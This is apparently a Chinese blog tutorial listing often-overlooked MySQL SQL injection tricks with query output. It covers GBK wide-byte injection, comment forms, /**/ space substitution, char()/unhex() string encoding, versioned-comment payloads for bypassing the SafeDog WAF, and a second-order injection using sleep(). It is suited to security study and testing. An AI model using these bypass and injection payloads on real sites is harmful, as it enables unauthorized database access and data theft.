那些容易被忽略、容易被弄错的地方

sql注入时的技巧

=========================================================================

*	如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入。

*	注释符的正确用法

		“-- ”才是mysql中的注释,注意后面有个空格

		mysql> select  user()  from (select 1)x where  '1'='1';-- '

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

		“#”注释,后面接不接空格无所谓

		mysql> select  user()  from (select 1) x where  '1'='1';#'

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

*	用/**/替代空格

		mysql> select/**/1;

		+---+

		| 1 |

		+---+

		| 1 |

		+---+

		1 row in set (0.00 sec)

*	sql语句中字符串转义

	-	mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );

		+-------------------------------------------------------------------+

		| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |

		+-------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                  |

		+-------------------------------------------------------------------+

		1 row in set (0.00 sec)

	-	mysql>  select  concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                                                                                                                    |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		1 row in set (0.00 sec)

		# utf-8

	-	mysql> select unhex('E6B8B8E5AEA2');

		+-----------------------+

		| unhex('E6B8B8E5AEA2') |

		+-----------------------+

		| 游客                  |

		+-----------------------+

		1 row in set (0.00 sec)

*	数字和字符的比较,类似php中的弱类型

	-	mysql> select '10asfasfdeasdfasdf'=10;

		+-------------------------+

		| '10asfasfdeasdfasdf'=10 |

		+-------------------------+

		|                       1 |

		+-------------------------+

	-	mysql> select '0esfsadf'=0;

		+--------------+

		| '0esfsadf'=0 |

		+--------------+

		|            1 |

		+--------------+

*	绕过安全狗

	**	正则绕过

		-	select 1/*!50000union/*!*//*!50000select/*!*/2;

				+---+

				| 1 |

				+---+

				| 1 |

				| 2 |

				+---+

		-	mysql> select/*/#\*/1;

				+---+

				| 1 |

				+---+

				| 1 |

				+---+

				1 row in set (0.00 sec)

*	多个单引号相连时,最外层两个孤独单引号配对闭合,中间的连续偶数个单引号中每两个一组换算成一个。

	-	mysql> select '123''';

			+------+

			| 123' |

			+------+

			| 123' |

			+------+

			1 row in set (0.00 sec)

	-	mysql> select '123''''';

			+-------+

			| 123'' |

			+-------+

			| 123'' |

			+-------+

	-	mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'

			Empty set (1.00 sec)

		此特点可以引发“二次注入”,比如,注册用户时输入昵称{nickname'},被转义为{nickname\'}但在插入到数据库后被还原,

		那么在需要将昵称作为查询条件的页面中就存在二次注入,另一个条件字段的值为{ or 0=sleep(1);#}即可触发。

  

sql注入时易被忽略的语法技巧以及二次注入的更多相关文章

  1. 【sql注入】简单实现二次注入

    [sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...

  2. sql手工注入时的探测技巧汇总

    工具的灵活性肯定比不上人,在手工探测的基础上再去自定义工具,才是正道. sql注入时手工探测技巧 =================================================== ...

  3. sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  4. 转:sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  5. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.二次注入也是 ...

  6. Sql 注入详解:宽字节注入+二次注入

    sql注入漏洞 原理:由于开发者在编写操作数据库代码时,直接将外部可控参数拼接到sql 语句中,没有经过任何过滤就直接放入到数据库引擎中执行了. 攻击方式: (1) 权限较大时,直接写入webshel ...

  7. Python连接MySQL数据库执行sql语句时的参数问题

    由于工作需要,今天写了一个Python小脚本,其中需要连接MySQL数据库,在执行sql命令时需要传递参数,结果出问题了.在网上查了一下,发现有以下几种方式传递参数: 一.直接把sql查询语句完整写入 ...

  8. ASPNETCOREAPI 跨域处理 SQL 语句拼接 多条件分页查询 ASPNET CORE 核心 通过依赖注入(注入服务)

    ASPNETCOREAPI 跨域处理 AspNetCoreApi 跨域处理 如果咱们有处理过MV5 跨域问题这个问题也不大. (1)为什么会出现跨域问题:  浏览器安全限制了前端脚本跨站点的访问资源, ...

  9. sql查询时增加自动编号和分页

    查询时加序号 a:没有主键的情形: ,) as iid,* into #tmp from TableName Select * from #tmp Drop table #tmp b:有主键的情形: ...

随机推荐

  1. x01.BSheepTree: 树

    数据结构,无外乎三: 1. 一对一,线性表,数组是也: 2. 一对多,树,菜单是也: 3. 多对多,图,网络是也. 涉及到树,有一个平衡的问题,左旋转,右旋转,转得人晕晕乎乎.好在陈广的<数据结 ...

  2. 4-1 Linux用户管理命令详解

    1. /etc/passwd 格式 用户名:密码:UID:GID:注释:家目录:默认shell useradd  [options ]    USERNAME -u: UID  要大于等于500, - ...

  3. SSH整合

    首先,SSH不是一个框架,而是多个框架(struts+spring+hibernate)的集成,是目前较流行的一种Web应用程序开源集成框架,用于构建灵活.易于扩展的多层Web应用程序. 集成SSH框 ...

  4. ACCELEROMETER

    顾名思义,是加速感应器.有2种应用吧:1,电脑保护,例如当笔记本掉落时,可以被自动检测到,此时会自动关闭硬盘操作以保护数据不在强烈冲击时丢失.

  5. [LeetCode] Russian Doll Envelopes 俄罗斯娃娃信封

    You have a number of envelopes with widths and heights given as a pair of integers (w, h). One envel ...

  6. [LeetCode] Lowest Common Ancestor of a Binary Tree 二叉树的最小共同父节点

    Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree. According ...

  7. 单例模式中用volatile和synchronized来满足双重检查锁机制

    背景:我们在实现单例模式的时候往往会忽略掉多线程的情况,就是写的代码在单线程的情况下是没问题的,但是一碰到多个线程的时候,由于代码没写好,就会引发很多问题,而且这些问题都是很隐蔽和很难排查的. 例子1 ...

  8. FineUI(专业版)v3.2.0 发布(ASP.NET UI控件库)!

    +2016-08-20 v3.2.0 +表格增强. +表格列RenderField增加属性ClientHtmlEncode,用于在客户端进行HTML编码. -增加示例:单元格编辑->杂项-> ...

  9. .NET程序员细数Oracle与众不同的那些奇葩点

    扯淡 距上次接触 Oracle 数据库已经是 N 年前的事了,Oracle 的工作方式以及某些点很特别,那会就感觉,这货就是一个奇葩!最近重拾记忆,一直在折腾 Oracle,因为 Oracle 与众不 ...

  10. Android开发之带你轻松集成友盟统计

    友盟统计是什么呢?为什么要集成他呢? 当我们需要获取自己写的软件的装机量和用户使用信息时,这时我们可以集成友盟统计. 首先到友盟统计中注册账号什么的就不废话了,直接看创建项目: 在个人中心中的管理里面 ...